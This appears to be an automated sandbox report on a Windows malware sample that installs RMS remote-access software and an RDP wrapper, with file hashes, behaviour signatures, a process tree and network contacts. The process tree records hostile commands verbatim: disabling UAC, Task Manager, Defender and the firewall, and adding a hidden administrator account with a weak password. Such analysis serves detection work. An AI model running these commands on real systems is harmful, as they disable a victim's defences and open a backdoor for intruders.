| SHA512 | afe353f3845675f31843e5e2ecf7d81586e52ea3b6d91107b4e2e703c34d8f28222fdb007f31893b3c833f532053ee30d50e8e10665734a5706029f7eba67c24 |
C:\Users\Admin\AppData\Local\Temp\RMS\defender.exe
| MD5 | b8a928d6df0741b9a2ee7b678a27f817 |
| SHA1 | c61fc60feb264be97628b4bad0633c31da987076 |
| SHA256 | 73e0dc6d8451996737727f9167a8e2a6924461c3d076d6f5506946393be9e3dc |
| SHA512 | afe353f3845675f31843e5e2ecf7d81586e52ea3b6d91107b4e2e703c34d8f28222fdb007f31893b3c833f532053ee30d50e8e10665734a5706029f7eba67c24 |
C:\Users\Admin\AppData\Local\Temp\A5E0.tmp\A5E1.bat
| MD5 | cc5b5df2834515d622d1c0a1bd4eadd2 |
| SHA1 | b1835556b419f667ac72c0de1383c470ad0469ea |
| SHA256 | 29dad257f98000f3603a882d1999e4934ec8e36907fd8222efff827be9d81fc8 |
| SHA512 | eb635c1f2f1d93215e64721da726da9034c580db74b0c0d2e085ef13e2e4562517a82087a6dcd6a06a5570bf3f19e5b0dc24ad1a32160fcb0e652f9a9ee6b121 |
\Users\Admin\AppData\Local\Temp\RMS\firewall.exe
| MD5 | 4954a72ec5e52b469bf63aa3dcff8b16 |
| SHA1 | 6cc0554e335d60b6953b75e814e161c63a409907 |
| SHA256 | b964f4411acc021b33d0c10cbb565ad1cdee329973a27636566c11f4a5adf31f |
| SHA512 | bde89d6063d73b3393753541c384d77316134b7a2718307c7d1b4221e1724d378aeedfb7c4141616b13934a35514aa7a92a11ccd93da2fc49f0db96f22d97b46 |
C:\Users\Admin\AppData\Local\Temp\RMS\firewall.exe
| MD5 | 4954a72ec5e52b469bf63aa3dcff8b16 |
| SHA1 | 6cc0554e335d60b6953b75e814e161c63a409907 |
| SHA256 | b964f4411acc021b33d0c10cbb565ad1cdee329973a27636566c11f4a5adf31f |
| SHA512 | bde89d6063d73b3393753541c384d77316134b7a2718307c7d1b4221e1724d378aeedfb7c4141616b13934a35514aa7a92a11ccd93da2fc49f0db96f22d97b46 |
C:\Users\Admin\AppData\Local\Temp\RMS\firewall.exe
| MD5 | 4954a72ec5e52b469bf63aa3dcff8b16 |
| SHA1 | 6cc0554e335d60b6953b75e814e161c63a409907 |
| SHA256 | b964f4411acc021b33d0c10cbb565ad1cdee329973a27636566c11f4a5adf31f |
| SHA512 | bde89d6063d73b3393753541c384d77316134b7a2718307c7d1b4221e1724d378aeedfb7c4141616b13934a35514aa7a92a11ccd93da2fc49f0db96f22d97b46 |
C:\Users\Admin\AppData\Local\Temp\AD9D.tmp\AD9E.bat
| MD5 | 902125bcd29f2c1e3ed47513b07d952a |
| SHA1 | d47f45491e758c68e602bf74f8b2c95e1f955800 |
| SHA256 | 176905e7abb1f5a0ff31aef142dcc5ec85905784a8b7c33f28cef970d3c673c3 |
| SHA512 | 7a1a77adfd457d07568e05af3b46d50bdc0dc79dc15533b702c8733930aff0e961acd2c2179c6742feab686515fa64dd915095e25564a47ea6ab6c47a813ff00 |
\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
| MD5 | ac216697481b39f9aa052936adaba8ac |
| SHA1 | d6d96811528c118a34874260376f2e43296c836d |
| SHA256 | 320f301daca3f6fad4d61601fa883624dcde52fe48ac12b3e08476b651390a76 |
| SHA512 | c5cad4beaa41faad6dd834eb84288559818fa3b9542cefe2250d67f225f5af0a065008dc40d9fa17382bb8fb427c2de0edfef790fc714a6186c602d6fe6bdb14 |
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
| MD5 | ac216697481b39f9aa052936adaba8ac |
| SHA1 | d6d96811528c118a34874260376f2e43296c836d |
| SHA256 | 320f301daca3f6fad4d61601fa883624dcde52fe48ac12b3e08476b651390a76 |
| SHA512 | c5cad4beaa41faad6dd834eb84288559818fa3b9542cefe2250d67f225f5af0a065008dc40d9fa17382bb8fb427c2de0edfef790fc714a6186c602d6fe6bdb14 |
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
| MD5 | ac216697481b39f9aa052936adaba8ac |
| SHA1 | d6d96811528c118a34874260376f2e43296c836d |
| SHA256 | 320f301daca3f6fad4d61601fa883624dcde52fe48ac12b3e08476b651390a76 |
| SHA512 | c5cad4beaa41faad6dd834eb84288559818fa3b9542cefe2250d67f225f5af0a065008dc40d9fa17382bb8fb427c2de0edfef790fc714a6186c602d6fe6bdb14 |
memory/1324-103-0x00000000001C0000-0x00000000001C1000-memory.dmp
\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
| MD5 | ac216697481b39f9aa052936adaba8ac |
| SHA1 | d6d96811528c118a34874260376f2e43296c836d |
| SHA256 | 320f301daca3f6fad4d61601fa883624dcde52fe48ac12b3e08476b651390a76 |
| SHA512 | c5cad4beaa41faad6dd834eb84288559818fa3b9542cefe2250d67f225f5af0a065008dc40d9fa17382bb8fb427c2de0edfef790fc714a6186c602d6fe6bdb14 |
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
| MD5 | ac216697481b39f9aa052936adaba8ac |
| SHA1 | d6d96811528c118a34874260376f2e43296c836d |
| SHA256 | 320f301daca3f6fad4d61601fa883624dcde52fe48ac12b3e08476b651390a76 |
| SHA512 | c5cad4beaa41faad6dd834eb84288559818fa3b9542cefe2250d67f225f5af0a065008dc40d9fa17382bb8fb427c2de0edfef790fc714a6186c602d6fe6bdb14 |
memory/1312-107-0x00000000001C0000-0x00000000001C1000-memory.dmp
\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
| MD5 | ac216697481b39f9aa052936adaba8ac |
| SHA1 | d6d96811528c118a34874260376f2e43296c836d |
| SHA256 | 320f301daca3f6fad4d61601fa883624dcde52fe48ac12b3e08476b651390a76 |
| SHA512 | c5cad4beaa41faad6dd834eb84288559818fa3b9542cefe2250d67f225f5af0a065008dc40d9fa17382bb8fb427c2de0edfef790fc714a6186c602d6fe6bdb14 |
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
| MD5 | ac216697481b39f9aa052936adaba8ac |
| SHA1 | d6d96811528c118a34874260376f2e43296c836d |
| SHA256 | 320f301daca3f6fad4d61601fa883624dcde52fe48ac12b3e08476b651390a76 |
| SHA512 | c5cad4beaa41faad6dd834eb84288559818fa3b9542cefe2250d67f225f5af0a065008dc40d9fa17382bb8fb427c2de0edfef790fc714a6186c602d6fe6bdb14 |
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
| MD5 | ac216697481b39f9aa052936adaba8ac |
| SHA1 | d6d96811528c118a34874260376f2e43296c836d |
| SHA256 | 320f301daca3f6fad4d61601fa883624dcde52fe48ac12b3e08476b651390a76 |
| SHA512 | c5cad4beaa41faad6dd834eb84288559818fa3b9542cefe2250d67f225f5af0a065008dc40d9fa17382bb8fb427c2de0edfef790fc714a6186c602d6fe6bdb14 |
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1160-115-0x00000000001C0000-0x00000000001C1000-memory.dmp
memory/484-116-0x00000000002F0000-0x00000000002F1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RMS\vp8decoder.dll
| MD5 | 0a98acb6e3389b806970d6b8afe849c3 |
| SHA1 | b9265779510c0f444ca58f6f6b3286d0f0439b77 |
| SHA256 | 733f5b78a50ffe54ab315efed57d3821be0b65e3f5db9c62607c904fb5efbf3f |
| SHA512 | 33b6d5b567536c32ad1553e664c357b301f89f2c60a3c0d37e7d73a295404706c80fce66d6d124a4b4293e13253267fcfeca482e387a5acb5ab04e57c5a54177 |
C:\Users\Admin\AppData\Local\Temp\RMS\vp8encoder.dll
| MD5 | 33425d50b3f3837bd129dbd22f60de00 |
| SHA1 | 81c8e05b1283d7e993aec25c7341e48678047249 |
| SHA256 | 521d85e9116c6a660a463340c1d5f91d1c50f7ef5f18081e58f6d57b33a56756 |
| SHA512 | 496cf0734dbbeacaa74b64fe5e8e1ed628bde736dba5ab91097bdc237ad95183cb3252503203f17810cd927cfa978d1794af7479163f794bb27f822aa3af4c58 |
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
| MD5 | ef6333a371161c3244425b5355cf4a85 |
| SHA1 | dd9b0c91c929b505dae93fe7e80bec5954591d73 |
| SHA256 | 04d5a7824dca49e7a1b170b3050b83a0eced83543bd860924de9faeb2c40a703 |
| SHA512 | a078f9a0d7979f793b4e0976fe369869e0e425ad139c86f3b9be2ae2386f7bc6f116c3ea8dc17ffbc0f003df0ef953535e638acf18e427f2797f46b1deae773c |
\ProgramData\RDP\RDPWInst.exe
| MD5 | 9c257b1d15817a818a675749f0429130 |
| SHA1 | 234d14da613c1420ea17de60ab8c3621d1599f6f |
| SHA256 | b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c |
| SHA512 | b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521 |
C:\Users\Admin\AppData\Local\Temp\RMS\remsetup.bat
| MD5 | 085edd6244d42ba399475686e9b71ea7 |
| SHA1 | 77068b9f3bd7fad105ae1e4f57a5c463e194deb3 |
| SHA256 | f910663b3b2f6d48473d91c716b139583bf292a0dfe592b10b0dc9795e0f77f9 |
| SHA512 | 877313fb1c30e6a0a372d602c5fbd02ed9c86b658a46a282bb912d8d642aa1e3ce2d0febc6d2b119e7ff37f0b8ce0e97267315d9ccab7eba4f8a797e345d519c |
\Program Files\RDP Wrapper\rdpwrap.dll
| MD5 | 461ade40b800ae80a40985594e1ac236 |
| SHA1 | b3892eef846c044a2b0785d54a432b3e93a968c8 |
| SHA256 | 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4 |
| SHA512 | 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26 |
C:\Program Files\RDP Wrapper\rdpwrap.ini
| MD5 | dddd741ab677bdac8dcd4fa0dda05da2 |
| SHA1 | 69d328c70046029a1866fd440c3e4a63563200f9 |
| SHA256 | 7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668 |
| SHA512 | 6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
| MD5 | c39f7e337bab5d1e58ebd11e334426d2 |
| SHA1 | bc73b69a2b06d36df926867cb5cf9b637d1871f8 |
| SHA256 | a7113e0c60b28c7512a714f957ba5cb0da83eef4ab785b9a223b86e0247475d6 |
| SHA512 | d585b3edb423bde4d75d0d5009538b1394e0133601fd0ca8341fe67e75eb5794c38c5ea8d02eb98f64ff670744effe1b86ece6a2840abb6f33c917071657d0c1 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
| MD5 | 85e3b436490181218c6c9334d9f61b8a |
| SHA1 | 3235a094465d3fa510a400606fd591630e7e77fc |
| SHA256 | 3f4190f5bbf8aab8e7b547994a67321be50e128f6b14bebd462222c2beb57b40 |
| SHA512 | ece664a457f7310dcf9d8cb9a3f5bd613765d7938b06c2d81ab2db8bf0b3904cd76ad426a589fa80d742cd84ce17efe0a9f331dc7b70054335b7607c4c016896 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | aca4d188af2251a00bb1631560a590d9 |
| SHA1 | 81eaac184c87160750b6ffaf0d79a8a628ca9c3f |
| SHA256 | 8f03e6ef99cbba313e8153367c209777932593c373bff86cb280025173865fce |
| SHA512 | fbb1dace446f14d47aa2f4d167e5aa5fb6d8eaeec24515d88c0b89ab72cedf14507e2699fe0c79a4190c6b2c9f1ab3f564c8780709525e9d60885d261da43e1f |
Analysis: behavioral2
Detonation Overview
Submitted
2022-02-08 16:54
Reported
2022-02-08 18:41
Platform
win10v2004-en-20220113
Max time kernel
174s
Max time network
204s
Command Line
Signatures
RMS
UAC bypass
ACProtect 1.3x - 1.4x DLL software
Disables Task Manager via registry modification
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\RDP.exe | N/A |
| N/A | N/A | C:\ProgramData\RDP\run.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\uac.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\task.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\defender.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\firewall.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\RDP\RDPWInst.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe | N/A |
| N/A | N/A | C:\ProgramData\RDP\RDPWInst.exe | N/A |
Modifies Windows Firewall
Sets DLL path for service in the registry
Sets file to hidden
UPX packed file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RMS\task.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RMS\defender.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RMS\firewall.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\c19874a8160089e1ea6d64fa76e15a0b0d348aa1a0260c72f1db77324231d0a6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RMS\setup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RMS\RDP.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\ProgramData\RDP\run.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RMS\uac.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\svchost.exe | N/A |
Checks installed software on the system
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\ProgramData\RDP\RDPWInst.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\ProgramData\RDP\RDPWInst.exe | N/A |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.dll | C:\ProgramData\RDP\RDPWInst.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\DataStore.edb | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\ReportingEvents.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Logs\CBS\CBS.log | C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\pending.xml | C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe | N/A |
| File opened for modification | C:\Windows\WindowsUpdate.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log | C:\Windows\system32\svchost.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\RDP.exe | N/A |
| N/A | N/A | C:\ProgramData\RDP\run.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\uac.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\task.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\defender.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\firewall.exe | N/A |
| N/A | N/A | C:\ProgramData\RDP\RDPWInst.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\RDP\RDPWInst.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\c19874a8160089e1ea6d64fa76e15a0b0d348aa1a0260c72f1db77324231d0a6.exe
"C:\Users\Admin\AppData\Local\Temp\c19874a8160089e1ea6d64fa76e15a0b0d348aa1a0260c72f1db77324231d0a6.exe"
C:\Users\Admin\AppData\Local\Temp\RMS\setup.exe
"C:\Users\Admin\AppData\Local\Temp\RMS\setup.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RMS\setup.bat" "
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\find.exe
find "rutserv.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rutserv.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rfusclient.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im systemp.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im igfxtraise.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im RMS.exe
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\SysWOW64\timeout.exe
timeout 1
C:\Users\Admin\AppData\Local\Temp\RMS\RDP.exe
RDP.exe
C:\ProgramData\RDP\run.exe
"C:\ProgramData\RDP\run.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\RDP\run.bat" "
C:\Windows\SysWOW64\timeout.exe
timeout 1
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
C:\Windows\SysWOW64\regedit.exe
regedit /s "regedit.reg"
C:\Windows\SysWOW64\timeout.exe
timeout 1
C:\Users\Admin\AppData\Local\Temp\RMS\uac.exe
uac.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9207.tmp\9208.bat C:\Users\Admin\AppData\Local\Temp\RMS\uac.exe"
C:\Windows\system32\cmd.exe
Cmd /k Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t "REG_DWORD" /d "0" /f
C:\Windows\system32\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t "REG_DWORD" /d "0" /f
C:\Users\Admin\AppData\Local\Temp\RMS\task.exe
task.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\98FC.tmp\98FD.bat C:\Users\Admin\AppData\Local\Temp\RMS\task.exe"
C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
C:\Users\Admin\AppData\Local\Temp\RMS\defender.exe
defender.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9AD1.tmp\9AD2.bat C:\Users\Admin\AppData\Local\Temp\RMS\defender.exe"
C:\Windows\system32\net.exe
net stop "WinDefend"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WinDefend"
C:\Windows\SysWOW64\net.exe
net user root /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user root /add
C:\Windows\system32\taskkill.exe
taskkill /f /t /im "MSASCui.exe"
C:\Windows\SysWOW64\net.exe
net localgroup Администраторы root /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup Администраторы root /add
C:\Windows\SysWOW64\net.exe
net user root 12345
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user root 12345
C:\Users\Admin\AppData\Local\Temp\RMS\firewall.exe
firewall.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10FB.tmp\10FC.bat C:\Users\Admin\AppData\Local\Temp\RMS\firewall.exe"
C:\Windows\system32\net.exe
net stop "MpsSvc"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MpsSvc"
C:\Windows\system32\taskkill.exe
taskkill /f /t /im "FirewallControlPanel.exe"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v root /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
rutserv.exe /silentinstall
C:\ProgramData\RDP\RDPWInst.exe
"C:\ProgramData\RDP\RDPWInst.exe" -i -o
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
rutserv.exe /firewall
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
rutserv.exe /start
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe /tray
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Local\Temp\RMS" /S /D
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Local\Temp" /S /D
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe /tray
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RMS\remsetup.bat" "
C:\ProgramData\RDP\RDPWInst.exe
"C:\ProgramData\RDP\RDPWInst.exe" -w
C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | settings-win.data.microsoft.com | udp |
| NL | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | crl3.digicert.com | udp |
| US | 72.21.91.29:80 | crl3.digicert.com | tcp |
| US | 72.21.91.29:80 | crl3.digicert.com | tcp |
| US | 72.21.91.29:80 | crl3.digicert.com | tcp |
| US | 72.21.91.29:80 | crl3.digicert.com | tcp |
| NL | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | crl4.digicert.com | udp |
| US | 93.184.220.29:80 | crl4.digicert.com | tcp |
| US | 93.184.220.29:80 | crl4.digicert.com | tcp |
| US | 93.184.220.29:80 | crl4.digicert.com | tcp |
| US | 8.8.8.8:53 | settings-win.data.microsoft.com | udp |
| US | 52.167.17.97:443 | settings-win.data.microsoft.com | tcp |
| US | 52.167.17.97:443 | settings-win.data.microsoft.com | tcp |
| US | 52.167.17.97:443 | settings-win.data.microsoft.com | tcp |
| US | 93.184.220.29:80 | crl4.digicert.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | rmansys.ru | udp |
| RU | 31.31.198.18:80 | rmansys.ru | tcp |
